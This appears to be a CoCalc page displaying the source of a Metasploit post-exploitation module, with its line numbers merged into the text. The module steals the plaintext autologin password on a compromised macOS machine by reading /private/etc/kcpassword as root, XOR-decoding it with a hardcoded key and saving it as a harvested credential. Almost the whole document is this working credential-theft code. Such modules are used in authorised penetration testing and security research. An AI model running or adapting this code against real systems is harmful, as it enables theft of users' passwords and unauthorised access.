CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/osx/gather/autologin_password.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::OSX::Priv89# extract/verify by by XORing your kcpassword with your password10AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F]1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'OSX Gather Autologin Password as Root',17'Description' => %q{18This module will steal the plaintext password of any user on the machine19with autologin enabled. Root access is required.2021When a user has autologin enabled (System Preferences -> Accounts), OSX22stores their password with an XOR encoding in /private/etc/kcpassword.23},24'License' => MSF_LICENSE,25'Author' => [ 'joev' ],26'Platform' => [ 'osx' ],27'References' => [28['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html']29],30'SessionTypes' => [ 'meterpreter', 'shell' ]31)32)3334register_advanced_options([35OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword'])36])37end3839def run40# ensure the user is root (or can read the kcpassword)41unless is_root?42fail_with(Failure::NoAccess, 'Root privileges are required to read kcpassword file')43end4445# read the autologin account from prefs plist46read_cmd = 'defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username'47autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'")4849if autouser.present?50print_status "User #{autouser} has autologin enabled, decoding password..."51else52fail_with(Failure::NotVulnerable, 'No users on this machine have autologin enabled')53end5455# kcpass contains the XOR'd bytes56kcpass = read_file(kcpassword_path)57key = AUTOLOGIN_XOR_KEY5859# decoding routine, slices into 11 byte chunks and XOR's each chunk60decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc|61kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join62end.join.sub(/\x00.*$/, '')6364# save in the database65# Don't record a Login, since we don't know what service to tie it to66credential_data = {67workspace_id: myworkspace_id,68origin_type: :session,69session_id: session_db_id,70post_reference_name: refname,71username: autouser,72private_data: decoded,73private_type: :password74}7576create_credential(credential_data)77print_good "Decoded autologin password: #{autouser}:#{decoded}"78end7980private8182def kcpassword_path83datastore['KCPASSWORD_PATH']84end8586def user87@user ||= cmd_exec('whoami').chomp88end89end909192